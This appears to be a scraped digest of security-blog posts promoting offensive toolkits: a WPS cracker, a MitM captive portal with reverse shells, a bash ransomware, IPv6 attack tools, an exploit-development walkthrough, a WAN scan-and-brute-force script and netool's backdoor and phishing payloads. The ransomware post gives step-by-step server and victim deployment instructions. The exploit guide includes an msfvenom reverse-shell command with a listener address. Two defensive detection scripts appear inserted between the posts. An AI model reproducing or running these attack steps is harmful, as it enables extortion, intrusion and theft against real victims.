Channel: Bash Script – Security List Network™

HT-WPS Breaker ~ bash script that helps extract the WPS PIN of many vulnerable routers.


High Touch WPS Breaker [HT-WB] is a small tool written in bash that helps extract the WPS PIN of many vulnerable routers and recover the network password. Under the hood it drives these tools automatically: Pixiewps, Reaver, Bully and Aircrack-ng, plus a few shell commands.

High Touch WPS Breaker [HT-WB] console banner. This script has been tested on Kali Sana, Arch Linux, Debian, Ubuntu, etc.


Latest Change 11/9/2015:
– HT-WB.sh
Menu Options :
+ Attack automatically.
+ Manual input.
+ Crack an access point's key with a known WPS PIN.
+ Crack a hidden access point.
+ Exit.

Download : HT-WPS-Breaker.zip(2.6 MB)  | Clone Url
Source : https://github.com/SilentGhostX


ARP MiTM Captive Portal.


MiTM-CaptivePortal is an ARP man-in-the-middle captive portal script.
Main menu:
1. Captive Portal – Log In Creds / Reverse Shell
2. Captive Portal – Log In Creds / Reverse Shell with DNS Spoof
3. SMB – Hash Grab
4. SMB – Hash Relay
5. Web – Beef Hook
6. Web – SSL Strip and Capture Traffic
7. Web – BDFproxy/BDFfactory
8. Web – Hamster/Ferret

ARP MiTM Captive Portal

Captive Portal – HTA Reverse Shell:
1. Cisco
2. Microsoft Forefront
3. Sophos
4. SQUID
5. TrendMicro
6. Fortigate\Fortinet
7. Flash Updater
8. Fortinet – Old Style
9. Custom

Reverse Shell Menu

Installation:
– git clone https://github.com/CroweCybersecurity/MiTM-CaptivePortal.git
– cd MiTM-CaptivePortal
– chmod +x mitm-portal.sh
– run ./mitm-portal.sh
This script has been tested on a Kali Sana 2.0 desktop and in a VMware virtual machine.

Source : https://github.com/CroweCybersecurity

Privilege-Escalation ~ This contains common local exploits and enumeration scripts.

$
0
0

Privilege-Escalation is a collection of common OSCP local exploits and enumeration scripts.
On Linux Folder:
– Post Exploitation Scripts:
— Linux Privilege Escalation Script Bash.sh
— Linux Privilege Escalation Script Bash.py
— Linux Privilege Escalation Script Bash.pl
– Python <= 2.4.2 realpath() Local Stack Overflow.py

Local Linux Enumeration & Privilege Escalation Script-py

On Windows Folder:
The Sysinternals Troubleshooting Utilities have been rolled up into a single Suite of tools. This file contains the individual troubleshooting tools and help files.
The Suite is a bundling of the following selected Sysinternals Utilities:

AccessChk - AccessChk is a command-line tool for viewing the effective permissions on files, registry keys, services, processes, kernel objects, and more.

AccessEnum - This simple yet powerful security tool shows you who has what access to directories, files and Registry keys on your systems. Use it to find holes in your permissions.

AdExplorer - Active Directory Explorer is an advanced Active Directory (AD) viewer and editor.

AdInsight - An LDAP (Light-weight Directory Access Protocol) real-time monitoring tool aimed at troubleshooting Active Directory client applications.

AdRestore - Undelete Server 2003 Active Directory objects.

Autologon - Bypass password screen during logon.

Autoruns - See what programs are configured to startup automatically when your system boots and you login. Autoruns also shows you the full list of Registry and file locations where applications can configure auto-start settings.

BgInfo - This fully-configurable program automatically generates desktop backgrounds that include important information about the system including IP addresses, computer name, network adapters, and more.

CacheSet - CacheSet is a program that allows you to control the Cache Manager's working set size using functions provided by NT. It's compatible with all versions of NT.

ClockRes - View the resolution of the system clock, which is also the maximum timer resolution.

Contig - Wish you could quickly defragment your frequently used files? Use Contig to optimize individual files, or to create new files that are contiguous.

Coreinfo - Coreinfo is a new command-line utility that shows you the mapping between logical processors and the physical processor, NUMA node, and socket on which they reside, as well as the caches assigned to each logical processor.

Ctrl2cap - This is a kernel-mode driver that demonstrates keyboard input filtering just above the keyboard class driver in order to turn caps-locks into control keys. Filtering at this level allows conversion and hiding of keys before NT even "sees" them. Ctrl2cap also shows how to use NtDisplayString() to print messages to the initialization blue-screen.


DebugView - Another first from Sysinternals: This program intercepts calls made to DbgPrint by device drivers and OutputDebugString made by Win32 programs. It allows for viewing and recording of debug session output on your local machine or across the Internet without an active debugger.

Desktops - This new utility enables you to create up to four virtual desktops and to use a tray interface or hotkeys to preview what’s on each desktop and easily switch between them.

Disk2vhd - Disk2vhd simplifies the migration of physical systems into virtual machines (p2v).

DiskExt - Display volume disk-mappings.

Diskmon - This utility captures all hard disk activity or acts like a software disk activity light in your system tray.

DiskView - Graphical disk sector utility.

Disk Usage (DU) - View disk usage by directory.

EFSDump - View information for encrypted files.

Handle - This handy command-line utility will show you what files are open by which processes, and much more.

Hex2dec - Convert hex numbers to decimal and vice versa.

Junction - Create Win2K NTFS symbolic links.

LDMDump - Dump the contents of the Logical Disk Manager's on-disk database, which describes the partitioning of Windows 2000 Dynamic disks.

ListDLLs - List all the DLLs that are currently loaded, including where they are loaded and their version numbers. Version 2.0 prints the full path names of loaded modules.

LiveKd - Use Microsoft kernel debuggers to examine a live system.

LoadOrder - See the order in which devices are loaded on your WinNT/2K system.

LogonSessions - List the active logon sessions on a system.

MoveFile - Allows you to schedule move and delete commands for the next reboot.

NTFSInfo - Use NTFSInfo to see detailed information about NTFS volumes, including the size and location of the Master File Table (MFT) and MFT-zone, as well as the sizes of the NTFS meta-data files.

PageDefrag - Defragment your paging files and Registry hives.

PendMoves - Enumerate the list of file rename and delete commands that will be executed the next boot.

PipeList - Displays the named pipes on your system, including the number of maximum instances and active instances for each pipe.

PortMon - Monitor serial and parallel port activity with this advanced monitoring tool. It knows about all standard serial and parallel IOCTLs and even shows you a portion of the data being sent and received. Version 3.x has powerful new UI enhancements and advanced filtering capabilities.

ProcDump - This new command-line utility is aimed at capturing process dumps of otherwise difficult to isolate and reproduce CPU spikes. It also serves as a general process dump creation utility and can also monitor and generate process dumps when a process has a hung window or unhandled exception.

Process Explorer - Find out what files, registry keys and other objects processes have open, which DLLs they have loaded, and more. This uniquely powerful utility will even show you who owns each process.

Process Monitor - Monitor file system, Registry, process, thread and DLL activity in real-time.

ProcFeatures - This applet reports processor and Windows support for Physical Address Extensions and No Execute buffer overflow protection.

PsExec - Execute processes on remote systems.

PsFile - See what files are opened remotely.

PsGetSid - Displays the SID of a computer or a user.

PsInfo - Obtain information about a system.

PsKill - Terminate local or remote processes.

PsList - Show information about processes and threads.

PsLoggedOn - Show users logged on to a system.

PsLogList - Dump event log records.

PsPasswd - Changes account passwords.

PsService - View and control services.

PsShutdown - Shuts down and optionally reboots a computer.

PsSuspend - Suspend and resume processes.

RAMMap - An advanced physical memory usage analysis utility that presents usage information in different ways on its several different tabs.

RegDelNull - Scan for and delete Registry keys that contain embedded null-characters that are otherwise undeleteable by standard Registry-editing tools.

RegJump - Jump to the registry path you specify in Regedit.

RootkitRevealer - Scan your system for rootkit-based malware.

SDelete - Securely overwrite your sensitive files and cleanse your free space of previously deleted files using this DoD-compliant secure delete program.

ShareEnum - Scan file shares on your network and view their security settings to close security holes.

ShellRunas - Launch programs as a different user via a convenient shell context-menu entry.

Sigcheck - Dump file version information and verify that images on your system are digitally signed.

Streams - Reveal NTFS alternate streams.

Strings - Search for ANSI and UNICODE strings in binary images.

Sync - Flush cached data to disk.

TCPView - Active socket command-line viewer.

VMMap - VMMap is a process virtual and physical memory analysis utility.

VolumeId - Set Volume ID of FAT or NTFS drives.

Whois - See who owns an Internet address.

WinObj - The ultimate Object Manager namespace viewer is here.

ZoomIt - Presentation utility for zooming and drawing on the screen.

Download : Privileges-Escalation.zip (13.3 MB)  | Clone Url
Source : https://github.com/AusJock

Bash Ransomware is a Simple bash ransomware.


WARNING:
Use this tool at your own risk. Author is not responsible or liable if you damage your own system or others. Follow all local, state, federal, and international laws as it pertains to your geographic location. Do NOT use this tool maliciously as it is being released for educational purposes for use in cyber exercises or demonstrations of adversarial tools.
This post is for educational purposes only: how to run and remove a ransomware written in bash.

Bash Console Message

Latest change: fixed coding bugs.
Bash Ransomware is a simple bash ransomware in the style of CryptoWall.
Requirements
– openssl
– jquery
– mysql
– php 5 (php5-mysql)

What to do on the server-side:
$ openssl genrsa -out priv.pem 4096
$ openssl rsa -pubout -in priv.pem -out pub.pem
$ cat /dev/urandom | tr -cd 'A-Za-z0-9' | fold -w 4096 | head -n 1 > key.bin
$ mkdir -p /var/www/html/downloads
$ cp pub.pem /var/www/html/downloads/
$ cp key.bin /var/www/html/downloads/
> Modify crypto.sh and replace the IP with your web server's IP/URL
$ cp crypto.sh /var/www/html/downloads/
> Copy all of the ransomware files to /var/www/html
> You should have all of the php files in the root of your web dir (/var/www/html/)
> You should also have /var/www/html/images/ and /var/www/html/scripts/
$ cd /var/www/html/downloads
$ python -m SimpleHTTPServer 8080 &
$ cd ../
> Modify admin.php, admin_query.php, decrypt.php, query.php, and target.php with your database information
> Next, create the database for storing the data (the following lines are typed at the mysql prompt)
$ mysql -u [user] -p
mysql> create database victims;
mysql> use victims;
mysql> create table target_list (id int(6) unsigned auto_increment primary key, unique_id varchar(16) not null, target_ip varchar(30), curr_time timestamp not null, exp_time timestamp not null, time_expired bool not null);
mysql> exit

What to do on the client-side
Get the target to download and execute the file, or, if you have access to the system, download it directly
$ chmod 755 crypto.sh
$ ./crypto.sh &

What it does
– Downloads the public key and key file to the target
– Move DB settings into a common.php file and refer to that file in each of the scripts (One place to edit instead of numerous places)
– Loops through the system and encrypts the various files
– Deletes the key file and leaves the public key
– Prints the ransom message
– Links to web pages where the user can see an active countdown of the time that is left before key deletion

TODO
– Configure script to download over https, more covert
– Add in error handling for non-existing files
– Improve functionality and capabilities
– Unique key pair per victim (In work)
– Add Screenshots
– Make ransom message on web page prettier

Remove :
cd /etc/cron.hourly/
rm instructions.sh
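Because the script's persistence lives in a cron drop-in directory, a quick way to verify the clean-up above (and to catch similar persistence elsewhere) is to audit that directory against an allowlist of expected jobs and flag anything recently modified. The script below is an added example for this page, not part of the bash-ransomware project; the directory layout, the allowlist and the files it creates under a temporary tree are constructed for the demonstration.

```bash
#!/usr/bin/env bash
# Added example for this page, not part of the bash-ransomware project:
# audit a cron drop-in directory (such as /etc/cron.hourly) against an
# allowlist of expected entries and flag anything unexpected or recently
# modified. Everything below runs against a constructed temporary tree.
set -eu

# audit_cron_dir DIR ALLOWLIST [MINUTES]
#   Prints "UNEXPECTED <name>" for entries missing from ALLOWLIST and
#   "RECENT <name>" for entries modified within the last MINUTES (default 60).
#   Returns 1 if anything was flagged, 0 if the directory looks clean.
audit_cron_dir() {
  local dir=$1 allowlist=$2 minutes=${3:-60} flagged=0 f name
  for f in "$dir"/*; do
    [ -e "$f" ] || continue          # empty directory: the glob stays literal
    name=${f##*/}
    if ! grep -qxF -- "$name" "$allowlist"; then
      printf 'UNEXPECTED %s\n' "$name"
      flagged=1
    fi
    if [ -n "$(find "$f" -mmin -"$minutes" -print 2>/dev/null)" ]; then
      printf 'RECENT %s\n' "$name"
      flagged=1
    fi
  done
  return "$flagged"
}

# Constructed demo tree: one long-standing, allowlisted job and one freshly
# dropped script that is not on the allowlist.
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT
mkdir -p "$DEMO/cron.hourly"
printf 'logrotate\n' > "$DEMO/allowlist"
touch -t 201501010000 "$DEMO/cron.hourly/logrotate"
printf '#!/bin/sh\n' > "$DEMO/cron.hourly/instructions.sh"

audit_cron_dir "$DEMO/cron.hourly" "$DEMO/allowlist" 60 \
  || echo "review the entries above before removing them"
```

Run against a real system the same function takes the live directory and a hand-maintained allowlist (for example `audit_cron_dir /etc/cron.hourly /root/cron.allow 1440`); a non-zero exit code makes it usable from a monitoring job.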


Download : bash-ransomware.zip(239 KB)
Source : https://github.com/SubtleScope

Updates THC Hydra – IPv6 attack toolkit v-2.8-dev.


Latest Change 10/11/2015, more helper bash scripts:
– dnsrevenum6.sh: scans the reverse DNS entries of the /48 of the IPv6 address on the responsible DNS server; if there are DNS SOA problems and the prefix length is not 48, you can specify it as an extra option on the command line.
– create_network_map.sh: creates a GV file for use with Graphviz to draw a network topology map; file1 must have exactly one entry per line.
– dnssecwalk.sh: tries dnssecwalk on all nameservers until one is found, or on all of them if -a is given as an option.
– trace62list.sh: prepares a trace6 output file for the network topology map generation tool.
– axfr.sh: data is saved to $domain-$ns.zone.

more helper bash scripts

CHANGELOG
=========
NOTE: More tools exist, but are only handed out to specific people who develop ipv6 security/pentest tools themselves, or support the thc-ipv6 toolkit development. If this matches *you* send me an email to vh (at) thc (dot) org , with “thc-ipv6 antispam” in the subject line.

v2.8-dev:
* TCP Fast Open support (22/06/2015)
* fake_router26:
– option -X removes router entry from targets on exit (patch from Dan Luedtke, thanks)
* flood_router26:
– Fix – the source mac was always null bytes without evasion, thanks to Christopher Werny for reporting
* ndpexaust26:
– option -m generates maximum size packets
* dump_router6:
– fixed route option parsing
* thcping6:
– added -O TCP Fast Open cookie request option
* thcsyn6
– added -O TCP Fast Open fake cookie sending option
* connect6:
– will now print the known MTU path to the destination upon successful connect
* Renamed dos_mld.sh to dos_mld6.sh and local_discovery.sh to local_discovery6.sh

INTRODUCTION
============
This code was inspired when I got into touch with IPv6, learned more and more about it – and then found no tools to play (read: “hack”) around with. First I tried to implement things with libnet, but then found out that the IPv6 implementation is only partial – and sucks. I tried to add the missing code, but well, it was not so easy, hence I saved my time and quickly wrote my own library.

LIMITATIONS
===========
This code currently only runs on:
– Linux 2.6.x or newer (because of /proc usage)
– Ethernet
But this means for all linux guys that it will work for 98% of your use cases.
Patches are welcome! (add “antispam” in the subject line to get through my
anti-spam protection, otherwise the email will bounce)

THE TOOLS
=========
The THC IPV6 ATTACK TOOLKIT comes already with lots of effective attacking tools:
– parasite6: ICMPv6 neighbor solicitation/advertisement spoofer, puts you as man-in-the-middle, same as ARP mitm (and parasite)
– alive6: an effective alive scanner, which will detect all systems listening to this address
– dnsdict6: parallelized DNS IPv6 dictionary bruteforcer
– fake_router6: announce yourself as a router on the network, with the highest priority
– redir6: redirect traffic to you intelligently (man-in-the-middle) with a clever ICMPv6 redirect spoofer
– toobig6: mtu decreaser with the same intelligence as redir6
– detect-new-ip6: detect new IPv6 devices which join the network, you can run a script to automatically scan these systems etc.
– dos-new-ip6: detect new IPv6 devices and tell them that their chosen IP collides on the network (DOS).
– trace6: very fast traceroute6 which supports ICMP6 echo request and TCP-SYN
– flood_router6: flood a target with random router advertisements
– flood_advertise6: flood a target with random neighbor advertisements
– fuzz_ip6: fuzzer for IPv6
– implementation6: performs various implementation checks on IPv6
– implementation6d: listen daemon for implementation6 to check behind a FW
– fake_mld6: announce yourself in a multicast group of your choice on the net
– fake_mld26: same but for MLDv2
– fake_mldrouter6: fake MLD router messages
– fake_mipv6: steal a mobile IP to yours if IPSEC is not needed for authentication
– fake_advertiser6: announce yourself on the network
– smurf6: local smurfer
– rsmurf6: remote smurfer, known to work only against linux at the moment
– exploit6: known IPv6 vulnerabilities to test against a target
– denial6: a collection of denial-of-service tests against a target
– thcping6: sends a hand crafted ping6 packet
– sendpees6: a tool by willdamn@gmail.com, which generates neighbor solicitation requests with a lot of CGAs (crypto stuff 😉 to keep the CPU busy. nice.
and about 25 more tools for you to discover :-)

Just run the tools without options and they will give you help and show the command line options.
DETECTION
=========
Most tools can easily be detected by an IDS or specialized detection software. This is done on purpose to make rogue usage detection easier. The tools either carry a fixed packet signature, or generically sniff for packets and answer them (for example they also answer ICMPv6 neighbor solicitations that are sent to a non-existing MAC, which is therefore very easy to detect).
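The detection property described above can be exercised offline from a neighbor-discovery event log: a defender solicits a "canary" address that no real host owns, and any station that advertises it is answering blindly. The bash/awk script below is an added example written for this page, not part of thc-ipv6; its log format (epoch, NS or NA, target address, source MAC) and every address and MAC in it are constructed for the demonstration. As a second, more general signal it also reports any MAC that advertises many distinct target addresses, which a normal station has no reason to do.

```bash
#!/usr/bin/env bash
# Added example for this page, not part of thc-ipv6: spot hosts that answer
# neighbor solicitations they should not. The log format and every address
# and MAC below are constructed for the demonstration.
set -eu

# Constructed ND event log, one event per line:
#   <epoch> <NS|NA> <target IPv6 address> <source MAC>
# fe80::dead:beef is the "canary": the defender solicited it, but no host
# owns it, so any advertisement for it comes from a blind responder.
ND_LOG=$(mktemp)
trap 'rm -f "$ND_LOG"' EXIT
cat >"$ND_LOG" <<'EOF'
1444600001 NS fe80::1 00:11:22:33:44:55
1444600001 NA fe80::1 00:11:22:33:44:55
1444600002 NS fe80::dead:beef 00:11:22:33:44:55
1444600002 NA fe80::dead:beef aa:bb:cc:dd:ee:ff
1444600003 NS fe80::2 00:11:22:33:44:66
1444600003 NA fe80::2 aa:bb:cc:dd:ee:ff
1444600004 NA fe80::3 aa:bb:cc:dd:ee:ff
1444600005 NA fe80::4 aa:bb:cc:dd:ee:ff
1444600006 NA fe80::2 00:11:22:33:44:66
EOF

# canary_responders LOG CANARY_ADDR...
#   Prints every MAC that sent a neighbor advertisement for a canary address.
canary_responders() {
  local log=$1; shift
  awk -v canaries="$*" '
    BEGIN { n = split(canaries, c, " "); for (i = 1; i <= n; i++) canary[c[i]] = 1 }
    $2 == "NA" && ($3 in canary) { hit[$4] = 1 }
    END { for (m in hit) print m }' "$log" | sort
}

# promiscuous_advertisers LOG THRESHOLD
#   Prints every MAC that advertised more than THRESHOLD distinct target
#   addresses; a single station normally answers only for its own addresses.
promiscuous_advertisers() {
  local log=$1 threshold=$2
  awk -v t="$threshold" '
    $2 == "NA" && !seen[$4 SUBSEP $3]++ { count[$4]++ }
    END { for (m in count) if (count[m] > t) print m }' "$log" | sort
}

echo "MACs answering the canary solicitation:"
canary_responders "$ND_LOG" fe80::dead:beef
echo "MACs advertising more than 2 distinct targets:"
promiscuous_advertisers "$ND_LOG" 2
```

In the constructed log only aa:bb:cc:dd:ee:ff answers the canary and it also advertises four different targets, so both checks agree; on a real segment the log would come from a capture tool that prints one ND event per line in this shape, and the canary address should be rotated so it cannot simply be allowlisted by the spoofing side.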

Installation :
– git clone https://github.com/vanhauser-thc/thc-ipv6
– cd thc-ipv6
– ./thc-ipv6-setup.sh
– or run the bash helper script

Download : thc-ipv6.zip(1.58 MB)  | Clone Url
Source : www.thc.org | vh@thc.org | Our Post Before

reed is a collection of Reverse Engineering and Exploit Development stuff.


reed is a collection of Reverse Engineering and Exploit Development stuff.
Latest Change 10/12/2015: Add shellcode execution frames in C#

Inside Folder :
– mans
– templates
– tools

sc2bin : Tool for building binaries containing the supplied shellcode for testing purposes.

List Of Tools:
+ sc2bin : Tool for building binaries containing the supplied shellcode for testing purposes.
+ scdisas: Tool for disassembling shellcode string.
+ scdump : Tool for dumping shellcode string from instructions of the .text (code) section of the given binary.
+ str4sc : Tool for converting string to instructions for pushing them to stack.
+ xorencoder : Tool for xoring shellcode with a given key (can be one or multiple bytes).

Exploit Development Step:
1. Fuzz it and have it crash with all A’s

2. Take control of EIP and one other register (ESP, EAX, etc.)
a. Use pattern_create $buffersize and pattern_offset $register_value

3. Find badchars
a. !mona bytearray -b "\x00" or use your own Python algorithm (even better)

4. Generate the shellcode and insert it into the script
a. Remember to generate the shellcode excluding the bad chars! Example:
msfvenom -f python -b '\x00' -p windows/shell_reverse_tcp LHOST=192.168.40.47 LPORT=443 EXITFUNC=thread > revshellwin.py
b. Remember to add at least 16 nops in front of the shellcode or it won’t work!

5. Find space for the shellcode
a. Try increasing the buffer if necessary

6. Find instruction that will change the execution flow, e.g. JMP ESP / JMP EAX:
a. Use nasm_shell to obtain the instruction opcodes
b. First find module without ASLR and possible DEP protections:
!mona modules
c. Second find the instruction inside unprotected module, e.g.
!mona find -s "\xff\xe4" -m VulnServer.exe
d. Remember that the instruction address must not contain any bad chars!
e. Remember to reverse the byte order of the address in your code (little-endian)! E.g. 0x65d11d71 becomes "\x71\x1d\xd1\x65"

f. In a more complex case, when you control ESP but don't have enough space there and some other register (e.g. EAX) doesn't point exactly at the beginning of the controllable input, you can write the instructions
add eax, $offset
jmp eax
into the buffer at ESP, and then put your shellcode at EAX+$offset

7. Test it.

Installation :
– git clone https://github.com/reider-roque/reed
– cd reed
– run the desired tool with ./ from its own folder

Source: https://github.com/reider-roque

RC-EXPLOITER v1.1.6 released.


DISCLAIMER:
The author does not hold any responsibility for the bad use of this script; remember that attacking targets without prior consent is illegal and punishable by law. This script was built to show how msf resource files can automate tasks.

Scanning WAN networks in search of targets may take 10 to 15 minutes depending on your network connection, and will search 1024 random hosts for the selected service/port. The file 'brute.txt' may be edited to insert new entries, or you can provide the full path to another dictionary file to be used in brute-forcing services.

Additional tool settings can be configured by editing the 'settings' file (nano settings) before running the tool; settings such as using decoys (when scanning WAN networks) or spoofing the MAC address (change MAC and IP address) can only be configured before the tool is started.

rc-exploiter-v1.1.6

Features:
1º – scan in WAN for the selected port (service) open
2º – port the hosts found to the msf database and set global variables (msfdb.rc)
3º – run the corresponding exploit.rc (ssl.rc) against all RHOSTS set before.
work flow:
1º this script asks the attacker to input the port number to search
2º then uses nmap to search WAN networks for the specified open port
3º builds a resource file (.rc) to port the targets found to the msf database
4º starts msf db and launches the corresponding exploit.rc file against all targets

Note:
“all ‘exploits.rc’ will use nmap nse script engine and msf auxiliary modules to exploit the target And each discovered matching login and password will create a Metasploit session”.

install:
git clone git://git.code.sf.net/p/rcexploiter/RC-exploiter RC-exploiter
cd RC-exploiter && chmod +x *.sh
sudo ./rc-exploiter.sh

Source : http://sourceforge.net/projects/rcexploiter

netool.sh V- 4.5.2 released : MitM PENTESTING OPENSOURCE T00LKIT.


Changelog v-4.5 .2:
+ UPGRADE => msfcli replaced by msfconsole
+ netool.sh => “added” file selection GUI -> zenity displays
+ priv8.sh => “added” MitM DLINK phishing -> capture routers creds
+ priv8.sh => “added” adobe_flash_hacking_team_uaf -> mitm+dns_spoof
+ INSTALL.sh => “added” build shortcut to toolkit -> gnome-desktop-item-edit
* netool.sh => “improved” input interface in use bug-fixed -> ettercap modules
* priv8.sh => “bug-fixed” ettercap IPV6 bug-fixed -> target selection /// ///
* priv8.sh => “improved” java.jar phishing -> download using phishing webpage or direct URL execute…
netool-v4.5

Scanning – Sniffing – Social Engineering

Netool is a toolkit written in bash, python and ruby that lets you automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. The toolkit makes tasks such as sniffing tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniffing, DNS-spoofing, DoS attacks in wan/lan networks and TCP/UDP packet manipulation using etter-filters easy; it can capture pictures from the target's web browsing (driftnet) and uses macchanger to decoy scans by changing the MAC address.

Rootsector: a module that automates some attacks over DNS_SPOOF + MitM (phishing – social engineering) using the metasploit, apache2 and ettercap frameworks, such as the generation of payloads, shellcode and backdoors delivered using dns_spoof and the MitM method to redirect a target to your phishing webpage.

Recently the “inurlbr” web scanner (by cleiton) was introduced, which allows us to search for SQL-related bugs using several search engines; this framework can also be used in conjunction with other frameworks like nmap (using the flag –comand-vul).

Installation:

git clone git://git.code.sf.net/p/netoolsh/opensource-kali opensource
cd opensource
chmod +x INSTALL.sh
./INSTALL.sh

Update type: u

Example: 

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27
-s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operative Systems Supported:
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

“TOOLKIT DEPENDENCIES”
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

“SCANNER INURLBR.php”
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

Features (Modules) :

"1-Show Local Connections"
  "2-Nmap Scanner menu"
        ->
        Ping target
        Show my Ip address
        See/change mac address
        change my PC hostname
        Scan Local network 
        Scan external lan for hosts
        Scan a list of targets (list.txt)          
        Scan remote host for vulns          
        Execute Nmap command
        Search for target geolocation
        ping of dead (DoS)
        Norse (cyber attacks map)
        nmap Nse vuln modules
        nmap Nse discovery modules
        <-
  "3-Open router config"       
  "4-Ip tracer whois"
  "5-firefox webcrawler addon"                           
  "6-Retrieve metadata"
        ->
        retrieve metadata from target website
        retrieve using a fake user-agent
        retrieve only certain file types
        <-
  "7-INURLBR.php (webcrawler)"
        -> 
        scanner inurlbr.php -> Advanced search with multiple engines, provided
        analysis enables to exploit GET/POST capturing emails/urls & internal
        custom validation for each target/url found. also the ability to use
        external frameworks in conjuction with the scanner like nmap,sqlmap,etc
        or simple the use of external scripts.
        <-
  "8-r00tsect0r automated exploits (phishing - social engeneering)"
        ->
        package.deb backdoor [Binary linux trojan]
        Backdooring EXE Files [Backdooring EXE Files]
        fakeupdate.exe [dns-spoof phishing backdoor]
        meterpreter powershell invocation payload [by ReL1K]
        host a file attack [dns_spoof+mitm-hosted file]
        clone website [dns-spoof phishing keylooger]
        Java.jar phishing [dns-spoof+java.jar+phishing]
        clone website [dns-spoof + java-applet]
        clone website [browser_autopwn phishing Iframe]
        Block network access [dns-spoof]
        Samsung TV DoS [Plasma TV DoS attack]
        RDP DoS attack [Dos attack against target RDP]
        website D0S flood [Dos attack using syn packets]
        firefox_xpi_bootstarpped_addon automated exploit
        PDF backdoor [insert a payload into a PDF file]
        Winrar backdoor (file spoofing)
        VBScript injection [embedded a payload into a world document]
        ".::[ normal payloads ]::."
        windows.exe payload
        mac osx payload
        linux payload
        java signed applet [multi-operative systems]
        android-meterpreter [android smartphone payload]
        webshell.php [webshell.php backdoor]
        generate shellcode [C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
        Session hijacking [cookie hijacking]
        start a lisenner [multi-handler]
        <-
  "9-Config ettercap"         
  "10-Launch MitM"            
  "11-Show URLs visited"       
  "12-Sniff remote pics"
  "13-Sniff SSL passwords"      
  "14-Dns-Spoofing"
  "15-Share files on lan"   
  "16-DoS attack {local}"      
  "17-Compile etter.filters"    
  "18-execute ettercap filter"
  "19-Common user password profiler [cupp.py]"

  d. delete lock folders
  a. about netool
  u. check for updates
  c. config toolkit
 db. access database
  q. quit

Download :
opensource.tar.gz (26.5 MB)
opensource[kali].tar.gz (26.5 MB)
Our Post Before  | Source : http://sourceforge.net/projects/netoolsh/


Firefox Security ToolKit – A tool that transforms Firefox Browsers into a penetration testing suite.


How?
It downloads the most important extensions and installs them in your browser. The extensions were chosen by a survey among the information security community, and Firefox Security Toolkit was built on its results. It also lets you download the Burp Suite certificate and a large user-agent list for User-Agent Switcher, so preparing your web-application testing browser is one click away.

Firefox Security Toolkit

How does it differ from well-known projects such as OWASP Mantra and Hcon STF?
OWASP Mantra and Hcon STF are not regularly updated and need a lot of work to develop and maintain. Firefox Security Toolkit, by contrast, does not need additional maintenance, although I would be maintaining it for any issues/bugs if needed. The extensions are downloaded from the Mozilla Add-ons store in their latest version, to ensure the best testing experience for the penetration tester.

Who can use Firefox Security Toolkit?
Web-Application Penetration Testers, Information Security Learners, and basically anyone interested in web-application security.

Browser Toolbar

Compatibility:
The project currently supports Linux/Unix environments.

Usage:
bash ./firefox_security_toolkit.sh

Available Addons:
– Cookie Export/Import
– Cookie Manager
– Copy as Plain Text
– Crypto Fox
– CSRF-Finder
– FireBug
– Fireforce
– FlagFox
– Foxy Proxy
– HackBar
– Live HTTP Headers
– Multi Fox
– PassiveRecon
– Right-Click XSS
– Tamper Data
– User Agent Switcher
– Wappalyzer
– Web Developer

Additional Features:
+ Downloading the Burp Suite certificate
+ Downloading a large user-agent list for User-Agent Switcher

Script:

#!/bin/bash
##################################################################################
##Firefox Security Kit
###Description:
#This script automatically transform Firefox Browser to a penetration testing suite. The script mainly focuses on downloading the required addons for web-application penetration testing.
###Version:
#v0.2
###Author:
#Mazin Ahmed <mazin AT mazinahmed DOT net>
###################################################################################
logo() { 
echo '    ______ _              ____                _____                           _  __            ______               __ __ __  _  __ '
echo '   / ____/(_)_____ ___   / __/____   _  __   / ___/ ___   _____ __  __ _____ (_)/ /_ __  __   /_  __/____   ____   / // //_/ (_)/ /_'
echo '  / /_   / // ___// _ \ / /_ / __ \ | |/_/   \__ \ / _ \ / ___// / / // ___// // __// / / /    / /  / __ \ / __ \ / // ,<   / // __/'
echo ' / __/  / // /   /  __// __// /_/ /_>  <    ___/ //  __// /__ / /_/ // /   / // /_ / /_/ /    / /  / /_/ // /_/ // // /| | / // /_  '
echo '/_/    /_//_/    \___//_/   \____//_/|_|   /____/ \___/ \___/ \__,_//_/   /_/ \__/ \__, /    /_/   \____/ \____//_//_/ |_|/_/ \__/  '
echo '                                                                                  /____/                                            '
echo -e "  _               __  __           _            _    _                        _  "
echo -e " | |__  _   _ _  |  \/  | __ _ ___(_)_ __      / \  | |__  _ __ ___   ___  __| | "
echo -e " | '_ \| | | (_) | |\/| |/ _\` |_  / | '_ \    / _ \ | '_ \| '_ \` _ \ / _ \/ _\` | "
echo -e " | |_) | |_| |_  | |  | | (_| |/ /| | | | |  / ___ \| | | | | | | | |  __/ (_| | "
echo -e " |_.__/ \__, (_) |_|  |_|\__,_/___|_|_| |_| /_/   \_\_| |_|_| |_| |_|\___|\__,_| "
echo -e "        |___/                                                                    "
echo -e "v0.1"
echo -e "\t\t\t\t\twww.mazinahmed.net"
echo -e "\t\t\t\t\ttwitter.com/mazen160"
echo -e "\t\t\t\t\tae.linkedin.com/pub/mazin-ahmed/86/795/629"
echo -e "\n\n"
}

logo

welcome() {
echo -e "\n\n"
echo -e "Usage:\n\t bash $0 run\n\n"
echo -e '[%%]Available Addons:'	
echo '#Cookie Export/Import
#Cookie Manager 
#Copy as Plain Text
#Crypto Fox
#CSRF-Finder
#FireBug
#Fireforce
#FlagFox
#Foxy Proxy
#HackBar
#Live HTTP Headers
#Multi Fox
#PassiveRecon
#Right-Click XSS
#Tamper Data
#User Agent Switcher
#Wappalyzer
#Web Developer
'
echo -e '[%%]Additional Features:'
echo -e '#Downloading Burp Suite Certificate'
echo -e '#Downloading a large user-agent list for User-Agent Switcher'
echo -e "\n\n"
echo "[$] legal disclaimer: Usage of Firefox Security Toolkit for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program"

}

if [[ $1 != 'run' ]];then
	welcome
	exit
fi
